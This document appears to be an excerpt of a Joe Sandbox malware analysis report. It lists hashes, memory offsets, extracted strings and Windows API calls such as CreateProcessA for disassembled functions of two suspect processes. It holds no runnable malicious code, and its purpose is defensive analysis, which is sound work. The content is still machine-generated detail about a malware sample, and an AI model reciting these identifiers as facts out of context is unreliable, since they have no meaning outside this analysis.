Instruction ID: aaf0e051d11c67aed60e4de3c68372bc410e87e8af1f2b2f22c2fa2f0b5b4045
Opcode Fuzzy Hash: 56ac90f87a76908a5a6c355e7e1fa6c52feed10c53f2ba1ca2eaf8a200e95825
Instruction Fuzzy Hash: BC112E74F401498FEB10DBE8D944BEEBBF9AB84315F0090A1E808AB345E67099428F51

Function 0144D4D0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 742d068175b8cc9259c16d0c60af10db1c42bbe693433fa56c2a765756790738
Instruction ID: 41423bc475e5af1cbf8de7e7a465240dd5142f32c45f1a9f69a8fd29cf7e350f
Opcode Fuzzy Hash: 742d068175b8cc9259c16d0c60af10db1c42bbe693433fa56c2a765756790738
Instruction Fuzzy Hash: D81129B4E00209DFEB54EFB9D551A9EBBF5FB94304F0085AAC0149B258EB706A05CB92

Function 01445607 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75a3f5dffdd522ff1818e14c7a3c4d83b81225b756f35687fd209b357426aca
Instruction ID: d7b24eba983d304a9b45fa37d0d89488ffc594da6623b739a6deb02b7869da7b
Opcode Fuzzy Hash: a75a3f5dffdd522ff1818e14c7a3c4d83b81225b756f35687fd209b357426aca
Instruction Fuzzy Hash: 700121727001056FDF018E55A800AEF3FDBEBD9654B28802BF519DB260CA75CC02C7A1

Function 013ED03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692028716.00000000013ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 013ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_13ed000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
Instruction ID: c08f4210558e2c2b152da0c2c1791d57ebc749bd51abebdf56528b6d1160c356
Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
Instruction Fuzzy Hash: 6311D075504344CFCB12CF54D5C8B15BFA1FB44318F28C6A9D8494B692C33AD84ACF52

Function 06BBD880 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f1f645d4db8095fd14dbddf97de4d17b8ef5b656e0eabf1e5e63a8ebfcbda73
Instruction ID: 1e6b36d376e07a4d1e525eb97aab99ed248b027e16955cccd725532416330a09
Opcode Fuzzy Hash: 3f1f645d4db8095fd14dbddf97de4d17b8ef5b656e0eabf1e5e63a8ebfcbda73
Instruction Fuzzy Hash: 26016D74846309DFD320AB74A06C7BEBBF9EB4B316F202894E615A72D5DB780904C751

Function 06BB9941 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02df4e8f1d5d52992bcb385cfbdbd349104a699f7ac2e4cc000635efd8a89982
Instruction ID: 099b9ae36c75d6382934f6ae55053a46cca8a572c009b89e132d00a2e2c6ec6c
Opcode Fuzzy Hash: 02df4e8f1d5d52992bcb385cfbdbd349104a699f7ac2e4cc000635efd8a89982
Instruction Fuzzy Hash: 731164BA800209DFDB10CF99C905BEEBBF4EF48320F14841AE658A7250C379A550CFA5

Function 06BB2210 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0776b130e0fca82b041ec48e4753c5a5c50fc3248d64396545aace929b04147f
Instruction ID: 0ee009786badf0c8badfaa84f3dc5aff862f13694524e79d2fd9979f31664506
Opcode Fuzzy Hash: 0776b130e0fca82b041ec48e4753c5a5c50fc3248d64396545aace929b04147f
Instruction Fuzzy Hash: 51018071B101148FCB60EFB8E8085BD77F4EF8931571105AAE805EB324DBB5C902CB91

Function 06BB2188 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a92bada2a9097b58c2d3513dd37305faabff64db6e22deef6506a6a8b74af3d
Instruction ID: bb86d516193aff21ad64b0e0a9011382808af5c0e748593eccfc991e4b2f0102
Opcode Fuzzy Hash: 3a92bada2a9097b58c2d3513dd37305faabff64db6e22deef6506a6a8b74af3d
Instruction Fuzzy Hash: AC01B670E002199FDF58EFB9D804AEEBBF5BF48200F10856AD519E7264E7755A01CB91

Function 06BB9708 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e46e25a161b25908b6688eb606b6c666e5feac219ad8aeed142a9f865d6f9e91
Instruction ID: 0f8545275af44899b94c97440e7e1daa8b5967a29c438be703b5e9b6b47e4838
Opcode Fuzzy Hash: e46e25a161b25908b6688eb606b6c666e5feac219ad8aeed142a9f865d6f9e91
Instruction Fuzzy Hash: 71F0E2323042187F8F099E98AC419EF7FABEBC9260B00442AFA09C7300CF318C2197A5

Function 06BB1CC0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f999e31a48b34c3d2326c0729b172f27dcd10587299e98acabe3320626186c75
Instruction ID: 41ceeb7f92455f9782490b9b2cc1c509d771e029a3f0c444d41daa597beb18f7
Opcode Fuzzy Hash: f999e31a48b34c3d2326c0729b172f27dcd10587299e98acabe3320626186c75
Instruction Fuzzy Hash: 2AF0E2307542009FCB58DB2DE828D7A37E9EFC5610B1544EBE806CB271EA60CC01CBA0

Function 06BB1CD0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a0f37ef354407701f608844c5fdfb7ac20a532a742b8078f65f6451f9da0c1
Instruction ID: ab649bdb929fc1425392746d7b596389ce64a5232f0be30956e6df51a6ae46d5
Opcode Fuzzy Hash: a8a0f37ef354407701f608844c5fdfb7ac20a532a742b8078f65f6451f9da0c1
Instruction Fuzzy Hash: D3F0A7343401008FDB58AF2EE864D7A77EAEFC561471584AAE506CB371DE70DC018B90

Function 06BBFE40 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c90fdde705b7e7184414ce82cd6e4008ae9412d9d34de86b92b21b9583588c
Instruction ID: bd274b92e7a537a8891accfc4c64e53233afdbac5090a5c29be1f95b44830c15
Opcode Fuzzy Hash: 32c90fdde705b7e7184414ce82cd6e4008ae9412d9d34de86b92b21b9583588c
Instruction Fuzzy Hash: EAF03AB4D14308EFDB94DFA5D4446BDBBF4AB59300F1091EAC804A7221E7305900CF41

Function 06BBFE98 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057afd7a2177e5e8f4870d5afab799c4c2efebf9ac42dca59db4681c5072758b
Instruction ID: 28b6094b6ab239b77969f965c85aa607be55ca9b2305e166f046bc35cdba8521
Opcode Fuzzy Hash: 057afd7a2177e5e8f4870d5afab799c4c2efebf9ac42dca59db4681c5072758b
Instruction Fuzzy Hash: F0F058B4D04308AFDB90DFA9E4456ADBBF9EB49300F0090EE8818A3291E7305A04CB81

Function 06BBFEF2 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95f54ff777d564972fec4e29481e5403dea84b919e41b5492a1e56bf335c598e
Instruction ID: f8ed2a4fc9d13493e4a320bac1ddccd6783f5f63a170c2e43b69b0b447d6d2c7
Opcode Fuzzy Hash: 95f54ff777d564972fec4e29481e5403dea84b919e41b5492a1e56bf335c598e
Instruction Fuzzy Hash: B5F01CB4D09308EFDB54DFA5E4456AEBBF9EB49300F1091EA8818E3394E7705A45CF81

Function 01442010 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb86d3fda11d37ab536673c0e83533df833bfcd4e7e950b2ea97f0aed72ba02
Instruction ID: 764f53d72a12b71034aeac998d8dfbc644851cd01574c6a4ddcd6f19a37c000e
Opcode Fuzzy Hash: adb86d3fda11d37ab536673c0e83533df833bfcd4e7e950b2ea97f0aed72ba02
Instruction Fuzzy Hash: D4E02235C203658BCB168A68AC005FEBB70EED2312B214297D02037112E7B1190AC7A1

Function 06BBFEA8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa5aa6fadabf0833db6ba1214fb971d574ceec3d9770089f5ddb9fe45acecb86
Instruction ID: ba44ef6efc6f621af78628a2c3a041481bd0869a6c2a9fea585edad577060dee
Opcode Fuzzy Hash: fa5aa6fadabf0833db6ba1214fb971d574ceec3d9770089f5ddb9fe45acecb86
Instruction Fuzzy Hash: F2E0EDB4D0430CEFDB54EFA9E5456BDBBF9EB49300F1091AA8814A7354E7705A40CF80

Function 06BBFE50 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c5c975e7d037735598b1538b63713cfbc06e516dce33ba6bfe3e53f2639c00
Instruction ID: b22acef4c815d026040820abaefaf6fa6b35d2bf18ba2f3bc36a0b115da06058
Opcode Fuzzy Hash: 79c5c975e7d037735598b1538b63713cfbc06e516dce33ba6bfe3e53f2639c00
Instruction Fuzzy Hash: 5AE0C9B4D0430CAFDB54EFA9D5856ADBBF8AB49300F1091AA8814A3354E7705A41CB80

Function 06BBFF00 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aa6c3063137a8d64bfd3c36dcf022eba6baae4d1c308ce84ef3f8601814e5d6
Instruction ID: d4a3e709532e952e151cace0ab400af27bcb6a69203a23df048cf02de0c33e40
Opcode Fuzzy Hash: 2aa6c3063137a8d64bfd3c36dcf022eba6baae4d1c308ce84ef3f8601814e5d6
Instruction Fuzzy Hash: BCE0C9B4D05308AFDB54DFA9E5456ADBBF8AB49300F1091AA8818A3354E7705A45CB80

Function 01442020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ed7878b0fbd8b401f73a2ea3ccc1921c2e7913d773b551a4fb71632ba593b3
Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
Opcode Fuzzy Hash: 42ed7878b0fbd8b401f73a2ea3ccc1921c2e7913d773b551a4fb71632ba593b3
Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1

Function 01448258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 83cca6be6a90317e6e10313891367e1ab804d76c2475639cd178c22b251a2055
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 26C0123320C1282BA625108E7C40AA3BB8CD2C12F4A250137F91CA3220A8529C8101A8

Function 0144A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d9834cc32985719014ac9820b37f953e8f1563f5e89663bbb236316644e915f
Instruction ID: c02322b736982cbb5fd51d4707319b3b8937a03f337288efce33d36e4f1f5afb
Opcode Fuzzy Hash: 5d9834cc32985719014ac9820b37f953e8f1563f5e89663bbb236316644e915f
Instruction Fuzzy Hash: EBD0173AB000089FCB048F88E8408DDB7B6FB8C221B108016E911A3260C6319821CB90

Function 01445EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba159081da90cff6d1ea08b6699291c8d1b7d4bf28b8339db7f52259f24ed6b7
Instruction ID: bdec675c0e50cf42756717f67e132fe177344cc60ed76c5abe0e98c6eff50654
Opcode Fuzzy Hash: ba159081da90cff6d1ea08b6699291c8d1b7d4bf28b8339db7f52259f24ed6b7
Instruction Fuzzy Hash: 3FD02B349083479BC736F774E8640993B71BAD110CB104596D8014D86BEB750C4A4F72

Function 0144F014 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de78b3fa81cb9cef2ef9dd3bcdd40ebf8a4d01220ceaadf2e8a424736837d4e5
Instruction ID: a6ae73e6b73e49ec3310503d3efe89b54022aa98e2962935b4545c26ba824fb0
Opcode Fuzzy Hash: de78b3fa81cb9cef2ef9dd3bcdd40ebf8a4d01220ceaadf2e8a424736837d4e5
Instruction Fuzzy Hash: 9FD04878904128DFDB209F64EA492E8B7B0EB99309F0014A7D909B2220D6705A568F22

Function 01445EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81cb3fe99c5305ed2b79c2f319a3febe341f48b20d43f20e4d25b10fba2c412
Instruction ID: fe6c849c517902cbd2403049f3dfbeb8fba02a384e50a8966f494ba86ae82524
Opcode Fuzzy Hash: e81cb3fe99c5305ed2b79c2f319a3febe341f48b20d43f20e4d25b10fba2c412
Instruction Fuzzy Hash: E7C0123450430F87D525F7B1F954555336A76D0518F404510E1090A56EDF745C494BB2

Function 06BB1CA1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33a25e14831ccc50a00763a4aa6ad4ecaa5e0924bb45823c87ff9b279a1642c2
Instruction ID: f1cc6e0479799d3edcfe7557f1e6c162b0ed2c7e2b10803e15080003738594b6
Opcode Fuzzy Hash: 33a25e14831ccc50a00763a4aa6ad4ecaa5e0924bb45823c87ff9b279a1642c2
Instruction Fuzzy Hash: 61C04C78100641C9ED6897A059D951D36B0ABC4715F6A9472C811551948A349045DB91

Non-executed Functions

Function 06BB2858 Relevance: 23.0, Strings: 18, Instructions: 461COMMON

Download Yara Rule

Strings

", xrefs: 06BB302F
PHq, xrefs: 06BB2C9E
PHq, xrefs: 06BB2E8E
LjEp, xrefs: 06BB2C04
LjEp, xrefs: 06BB2C1A
PHq, xrefs: 06BB2D93
LjEp, xrefs: 06BB2E07
LjEp, xrefs: 06BB2CF9
LjEp, xrefs: 06BB2B22
LjEp, xrefs: 06BB2DF1
LjEp, xrefs: 06BB2B0C
PHq, xrefs: 06BB2D7F
LjEp, xrefs: 06BB2D0F
PHq, xrefs: 06BB2BA6
PHq, xrefs: 06BB2C8A
PHq, xrefs: 06BB2B92
PHq, xrefs: 06BB2E7A
0oEp, xrefs: 06BB29A8

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: "$0oEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-3075396612
Opcode ID: 031450b5766a17170bc449dc14f9aac9950b440f8b07524afc1d4374ccd7e09d
Instruction ID: 573be0cfc595defc2bcc4ff1881d7b054c6aaa329a30dcf332793a6cefc9e8bf
Opcode Fuzzy Hash: 031450b5766a17170bc449dc14f9aac9950b440f8b07524afc1d4374ccd7e09d
Instruction Fuzzy Hash: C53280B4E002188FEB68DF65D954BEDBBB2BF89300F1090A9D809AB355DB755E85CF10

Function 06BB2848 Relevance: 12.9, Strings: 10, Instructions: 364COMMON

Download Yara Rule

Strings

", xrefs: 06BB302F
PHq, xrefs: 06BB2C9E
PHq, xrefs: 06BB2D7F
PHq, xrefs: 06BB2E8E
PHq, xrefs: 06BB2BA6
PHq, xrefs: 06BB2D93
PHq, xrefs: 06BB2C8A
PHq, xrefs: 06BB2B92
PHq, xrefs: 06BB2E7A
0oEp, xrefs: 06BB29A8

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: "$0oEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
API String ID: 0-659101215
Opcode ID: d0b7be2f3d5f7fd40b9a6b2ef7ad93f6ccc6aba4575bb6ccb36b6eff482df9f8
Instruction ID: 6c8034af1851822dc70b669daa1b2c54f52cacd597a41a8458356a63b6eeb5dc
Opcode Fuzzy Hash: d0b7be2f3d5f7fd40b9a6b2ef7ad93f6ccc6aba4575bb6ccb36b6eff482df9f8
Instruction Fuzzy Hash: 4302A1B4E002188FDB68DF65D994BEDBBB2BF89300F1080A9D809AB355DB755E85CF10

Function 06BBDA48 Relevance: 5.5, Strings: 4, Instructions: 493COMMON

Download Yara Rule

Strings

Xq, xrefs: 06BBDB7B
Xq, xrefs: 06BBDB33
Xq, xrefs: 06BBDAAD
Xq, xrefs: 06BBDA79

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 123073a81b42fdbe95531ad6202b0acd0404967b04c2c1a90c3a3a79dd795ec8
Instruction ID: 4ac1ae011b3466e1aa5db73bc7df2b458dd467422281c43ef5f5b691ae87d2e9
Opcode Fuzzy Hash: 123073a81b42fdbe95531ad6202b0acd0404967b04c2c1a90c3a3a79dd795ec8
Instruction Fuzzy Hash: 0BD1EFA8E0330523C5705D759C82EEB356EDBC86F1B109B54B6376B3E2EC64C88256F2

Function 06BBDA39 Relevance: 5.1, Strings: 4, Instructions: 93COMMON

Download Yara Rule

Strings

Xq, xrefs: 06BBDB7B
Xq, xrefs: 06BBDB33
Xq, xrefs: 06BBDAAD
Xq, xrefs: 06BBDA79

Memory Dump Source

Source File: 0000000A.00000002.3701385252.0000000006BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6bb0000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 73e072812b912af7ae9a525a1a6c0e5800b732da9f1931a4a35159018101fab9
Instruction ID: 792be5594541d6c2f45fa6b82428a093e0520579dc9b94412703658fe5bbfa91
Opcode Fuzzy Hash: 73e072812b912af7ae9a525a1a6c0e5800b732da9f1931a4a35159018101fab9
Instruction Fuzzy Hash: 173185B1E0022B4BEF748A6488517FFB7A5AFC4340F1475F98919A7640EAB8CD41DB91

Function 01446088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;q, xrefs: 0144609E
\;q, xrefs: 014460C6
\;q, xrefs: 01446094
\;q, xrefs: 014460BA

Memory Dump Source

Source File: 0000000A.00000002.3692757206.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1440000_rPO0977-6745.jbxd

Similarity

API ID:
String ID: \;q$\;q$\;q$\;q
API String ID: 0-2933265366
Opcode ID: ad1814191f24359dd8785ba8a718922e386543c8b71b1d59924241f17c5c6eeb
Instruction ID: 26784e7a151d8aeab26a7559f35b6fda2aeabf6738be522103b8aadce4f64c6b
Opcode Fuzzy Hash: ad1814191f24359dd8785ba8a718922e386543c8b71b1d59924241f17c5c6eeb
Instruction Fuzzy Hash: 5901A7717001258FEB25CA2DC444A2777F6BFCA6A471A827BE602CB3B5DA71DC428750

Analysis Process: EDyxAgkldisLe.exePID: 7276, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	298
Total number of Limit Nodes:	14

Executed Functions

Function 00D4D031 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D0BE
GetCurrentThread.KERNEL32 ref: 00D4D0FB
GetCurrentProcess.KERNEL32 ref: 00D4D138
GetCurrentThreadId.KERNEL32 ref: 00D4D191

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: dcb3dd5dad679d9642dba2df45e548d99ccca2ca0e8624d493b6ea758ff8a439
Instruction ID: 46afa479453f207bce9de45cb8da87789ac84691caf48c026775fe1663cea666
Opcode Fuzzy Hash: dcb3dd5dad679d9642dba2df45e548d99ccca2ca0e8624d493b6ea758ff8a439
Instruction Fuzzy Hash: CC5165B0D003498FEB14DFAAD548BAEBBF1BF88304F248459E409A7390D7746945CB25

Function 00D4D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00D4D0BE
GetCurrentThread.KERNEL32 ref: 00D4D0FB
GetCurrentProcess.KERNEL32 ref: 00D4D138
GetCurrentThreadId.KERNEL32 ref: 00D4D191

Memory Dump Source

Source File: 0000000B.00000002.1304796451.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d40000_EDyxAgkldisLe.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 072fd211dc53045bd15eb02359f1d654f9ac0e41bd564e33a8ea644e4baf0383
Instruction ID: d2d228b2a388492d2e14fe35a15cd61986496d4bc28dc6853dadb3159b68a0be
Opcode Fuzzy Hash: 072fd211dc53045bd15eb02359f1d654f9ac0e41bd564e33a8ea644e4baf0383
Instruction Fuzzy Hash: 6F5154B0D003498FEB14DFAAD548BAEBBF1BF88304F248459E409A7350D7746985CF65

Function 08724B1D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08724D5E

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1efbe52a80d5efe7ad4d0c80c13b8ed25122ad59a7a39ec5f9f4848b88cb2780
Instruction ID: e682b6dc78f92be9510bbfc4b1576fc55403cc836504f06d5b1f8ab18503d648
Opcode Fuzzy Hash: 1efbe52a80d5efe7ad4d0c80c13b8ed25122ad59a7a39ec5f9f4848b88cb2780
Instruction Fuzzy Hash: 44A15C71D01329CFEB24DF68C8417EDBBF2BB48305F0481A9E808A7244DB749985CFA5

Function 08724B28 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08724D5E

Memory Dump Source

Source File: 0000000B.00000002.1309335291.0000000008720000.00000040.00000800.00020000.00000000.sdmp, Offset: 08720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_8720000_EDyxAgkldisLe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 18a0694d3caac70cd89483561f63cf7a682fb95f20dc20185159e0b7dae22f8a
